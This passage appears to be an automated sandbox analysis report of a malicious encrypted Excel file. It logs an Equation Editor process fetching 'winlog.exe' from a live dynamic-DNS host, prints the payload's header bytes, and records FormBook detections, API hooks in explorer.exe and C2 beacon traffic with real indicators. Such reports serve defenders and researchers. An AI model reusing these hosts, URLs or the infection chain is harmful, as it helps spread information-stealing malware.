                              Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                              Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                              Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                              General
                              Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                              File Type:data
                              Stream Size:200
                              Entropy:3.13335930328
                              Base64 Encoded:False
                              Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                              Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                              General
                              Stream Path:\x6DataSpaces/Version
                              File Type:data
                              Stream Size:76
                              Entropy:2.79079600998
                              Base64 Encoded:False
                              Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                              Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                              Stream Path: EncryptedPackage, File Type: data, Stream Size: 2184664
                              General
                              Stream Path:EncryptedPackage
                              File Type:data
                              Stream Size:2184664
                              Entropy:7.99990143991
                              Base64 Encoded:True
                              Data ASCII:. U ! . . . . . x . M . . q . . . . . M . . . . . . R j ] X . e L . . . . . . W . n , . . o ] . @ . F ^ $ . . . . . . W . . . . . . . . p % * 9 . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . .
                              Data Raw:cf 55 21 00 00 00 00 00 78 c3 4d e3 ca 71 c1 ec f6 8a f4 4d d1 e7 aa 8e a9 e6 52 6a 5d 58 d0 65 4c 99 97 01 ac 9f fc 57 a2 6e 2c 97 d2 6f 5d 0d 40 1d 46 5e 24 fb e2 99 ad f7 d9 57 b3 be a5 8b 05 e2 cb f9 70 25 2a 39 c4 93 e5 17 61 c4 12 12 28 37 06 70 f7 f6 4f 7b c4 93 e5 17 61 c4 12 12 28 37 06 70 f7 f6 4f 7b c4 93 e5 17 61 c4 12 12 28 37 06 70 f7 f6 4f 7b c4 93 e5 17 61 c4 12 12
                              Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                              General
                              Stream Path:EncryptionInfo
                              File Type:data
                              Stream Size:224
                              Entropy:4.5381164508
                              Base64 Encoded:False
                              Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . ] D b . B o . p . ` . . . : q ) ^ t . . . . O . . . . r . . 4 . . . . . 1 . E . . . . 7 + . W . . . . . . . . . . . . . % . L % . . . .
                              Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 20, 2020 11:27:50.286534071 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.506021976 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.506149054 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.506499052 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.727421999 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.727463961 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.727499008 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.727509975 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.727524996 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.727533102 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.727560997 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.727600098 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.947706938 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947762012 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947798967 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947834015 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947875977 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947932959 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.947948933 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.947962046 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.947981119 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.948026896 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.948065042 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:50.948085070 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:50.948111057 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.167541981 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167603016 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167650938 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167692900 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167731047 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167779922 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167793989 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.167810917 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.167845964 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.167886019 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167927027 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.167954922 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.167990923 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168000937 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168039083 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168056965 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168091059 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168123007 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168160915 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168191910 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168224096 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168241978 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168287039 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168311119 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168344021 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168361902 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168401003 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.168418884 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.168453932 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.172945023 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.387686968 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.387763023 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.387820005 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.387849092 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.387872934 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.387880087 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.387929916 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.387973070 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.387989044 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388026953 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388044119 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388087988 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388098955 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388128042 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388164997 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388206005 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388221979 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388259888 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388278961 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388304949 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388345957 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388390064 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388415098 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388461113 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388483047 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388526917 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388550043 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388592958 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388617992 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388659954 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388684988 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388725996 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388753891 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388798952 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388819933 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388864040 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388887882 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388930082 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.388955116 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.388999939 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389024973 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389070988 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389091969 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.389136076 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.389159918 CET8049167103.141.138.87192.168.2.22

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 20, 2020 11:27:50.227308035 CET5219753192.168.2.228.8.8.8
                              Nov 20, 2020 11:27:50.271962881 CET53521978.8.8.8192.168.2.22
                              Nov 20, 2020 11:29:22.352675915 CET5309953192.168.2.228.8.8.8
                              Nov 20, 2020 11:29:22.402642012 CET53530998.8.8.8192.168.2.22

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Nov 20, 2020 11:27:50.227308035 CET192.168.2.228.8.8.80x746fStandard query (0)thdyneverwalkachinese2loneinlifekthfnp.ydns.euA (IP address)IN (0x0001)
                              Nov 20, 2020 11:29:22.352675915 CET192.168.2.228.8.8.80xa14dStandard query (0)www.segredosdocopywriting.comA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Nov 20, 2020 11:27:50.271962881 CET8.8.8.8192.168.2.220x746fNo error (0)thdyneverwalkachinese2loneinlifekthfnp.ydns.eu103.141.138.87A (IP address)IN (0x0001)
                              Nov 20, 2020 11:29:22.402642012 CET8.8.8.8192.168.2.220xa14dNo error (0)www.segredosdocopywriting.com172.67.181.41A (IP address)IN (0x0001)
                              Nov 20, 2020 11:29:22.402642012 CET8.8.8.8192.168.2.220xa14dNo error (0)www.segredosdocopywriting.com104.24.99.174A (IP address)IN (0x0001)
                              Nov 20, 2020 11:29:22.402642012 CET8.8.8.8192.168.2.220xa14dNo error (0)www.segredosdocopywriting.com104.24.98.174A (IP address)IN (0x0001)

                              HTTP Request Dependency Graph

                              • thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
                              • www.segredosdocopywriting.com

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.2249167103.141.138.8780C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              TimestampkBytes transferredDirectionData
                              Nov 20, 2020 11:27:50.506499052 CET0OUTGET /chnsfrnd2/winlog.exe HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
                              Connection: Keep-Alive
                              Nov 20, 2020 11:27:50.727421999 CET2INHTTP/1.1 200 OK
                              Date: Fri, 20 Nov 2020 10:27:54 GMT
                              Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                              Last-Modified: Thu, 19 Nov 2020 20:54:09 GMT
                              ETag: "eb000-5b47bede9f95e"
                              Accept-Ranges: bytes
                              Content-Length: 962560
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: application/x-msdownload
                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 db b6 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 2e 0c 00 00 80 02 00 00 00 00 00 ee 4c 0c 00 00 20 00 00 00 60 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 4c 0c 00 4b 00 00 00 00 60 0c 00 b4 7d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 2c 0c 00 00 20 00 00 00 2e 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 7d 02 00 00 60 0c 00 00 7e 02 00 00 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0e 00 00 02 00 00 00 ae 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4c 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 52 00 00 3c 40 00 00 03 00 00 00 f4 00 00 06 0c 93 00 00 89 b9 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 3f 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 18 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 2a 02 28 04 00 00 06 20 00 00 00 00 16 3a e0 ff ff ff 26 20 00 00 00 00 38 d5 ff ff ff 00 13 30 03 00 4d 00 00 00 02 00 00 11 20 01 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 02 00 00 00 22 00 00 00 05 00 00 00 38 1d 00 00 00 73 22 00 00 06 13 00 20 00 00 00 00 28 05 00 00 06 3a d8 ff ff ff 26 38 ce ff ff ff 2a 11 00 6f 19 00 00 06 38 f3 ff ff ff 00 00 00 13 30 03 00 b1 00 00 00 01 00 00 11 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 65 00 00 00 45 00 00 00 25 00 00 00 64 00 00 00 05 00 00 00 38 60 00 00 00 02 7b 01 00 00 04 28 07 00 00 06 20 00 00 00 00 28 05 00 00 06 3a c8 ff ff ff 26 38 be ff ff ff 03 39 3a 00 00 00 20 01 00 00 00 28 05 00 00 06 3a ad ff ff ff 26 20 01 00 00 00 38 a2 ff ff ff 02 7b 01 00 00 04 3a b5 ff ff ff 38 00 00 00 00 38 0b 00 00 00 20 04 00 00 00 38 83 ff ff ff 2a 02 03 28 02 00 00 0a 20 03 00 00 00 28 05 00 00 06 3a 6c ff ff ff 26 20 01 00 00 00 38 61 ff ff ff 00 00 00 13 30 04 00 35 02 00 00 01 00 00 11 20 08 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 10 00 00 00 a7 00 00 00 82 01 00 00 1f 01 00 00 af 01 00 00 cd 00 00 00 4b
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELG_.L `@ @LK`} H.text, . `.rsrc}`~0@@.reloc@BLHR<@0?(88E8*( :& 80M 8E"8s" (:&8*o80 8EeE%d8`{( (:&89: (:& 8{:88 8*( (:l& 8a05 8EK


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              1192.168.2.2249168172.67.181.4180C:\Windows\explorer.exe
                              TimestampkBytes transferredDirectionData
                              Nov 20, 2020 11:29:22.433763027 CET1014OUTGET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1
                              Host: www.segredosdocopywriting.com
                              Connection: close
                              Data Raw: 00 00 00 00 00 00 00
                              Data Ascii:
                              Nov 20, 2020 11:29:22.465790987 CET1015INHTTP/1.1 301 Moved Permanently
                              Date: Fri, 20 Nov 2020 10:29:22 GMT
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: max-age=3600
                              Expires: Fri, 20 Nov 2020 11:29:22 GMT
                              Location: https://www.segredosdocopywriting.com/ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98
                              cf-request-id: 0686cca59a00007335491ca000000001
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Bf3j%2F1vQ%2Fjjmdm9TXlDCBJxYSVb4L5eqm54WB1%2Frab9jM5yqbhhBUV8xSjWCdkEizKcLUtPAfa3su3wCTHIj9Ot81X5eUax7HwwK1A0diXxwju%2BnK8yn1abAv1MRLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 5f517d4f5f567335-AMS
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Code Manipulations

                              User Modules

                              Hook Summary

                              Function NameHook TypeActive in Processes
                              PeekMessageAINLINEexplorer.exe
                              PeekMessageWINLINEexplorer.exe
                              GetMessageWINLINEexplorer.exe
                              GetMessageAINLINEexplorer.exe

                              Processes

                              Process: explorer.exe, Module: USER32.dll
                              Function NameHook TypeNew Data
                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE5
                              PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE5
                              GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE5
                              GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE5

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: EXCEL.EXE PID: 2268 Parent PID: 584

                              General

                              Start time:11:26:58
                              Start date:20/11/2020
                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Wow64 process (32bit):false
                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                              Imagebase:0x13f780000
                              File size:27641504 bytes
                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: EQNEDT32.EXE PID: 2412 Parent PID: 584

                              General

                              Start time:11:27:18
                              Start date:20/11/2020
                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                              Imagebase:0x400000
                              File size:543304 bytes
                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: vbc.exe PID: 2924 Parent PID: 2412

                              General

                              Start time:11:27:22
                              Start date:20/11/2020
                              Path:C:\Users\Public\vbc.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\Public\vbc.exe'
                              Imagebase:0x30000
                              File size:962560 bytes
                              MD5 hash:221E46C09EB3440BEB5A2256211C3262
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 33%, ReversingLabs
                              Reputation:low

                              Analysis Process: vbc.exe PID: 3024 Parent PID: 2924

                              General

                              Start time:11:27:54
                              Start date:20/11/2020
                              Path:C:\Users\Public\vbc.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Users\Public\vbc.exe
                              Imagebase:0x30000
                              File size:962560 bytes
                              MD5 hash:221E46C09EB3440BEB5A2256211C3262
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Analysis Process: vbc.exe PID: 3020 Parent PID: 2924

                              General

                              Start time:11:27:55
                              Start date:20/11/2020
                              Path:C:\Users\Public\vbc.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Users\Public\vbc.exe
                              Imagebase:0x30000
                              File size:962560 bytes
                              MD5 hash:221E46C09EB3440BEB5A2256211C3262
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Analysis Process: vbc.exe PID: 2948 Parent PID: 2924

                              General

                              Start time:11:27:55
                              Start date:20/11/2020
                              Path:C:\Users\Public\vbc.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\Public\vbc.exe
                              Imagebase:0x30000
                              File size:962560 bytes
                              MD5 hash:221E46C09EB3440BEB5A2256211C3262
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:low

                              Analysis Process: explorer.exe PID: 1388 Parent PID: 2948

                              General

                              Start time:11:27:57
                              Start date:20/11/2020
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:
                              Imagebase:0xffca0000
                              File size:3229696 bytes
                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Analysis Process: cmd.exe PID: 2232 Parent PID: 1388

                              General

                              Start time:11:28:07
                              Start date:20/11/2020
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\cmd.exe
                              Imagebase:0x4a550000
                              File size:302592 bytes
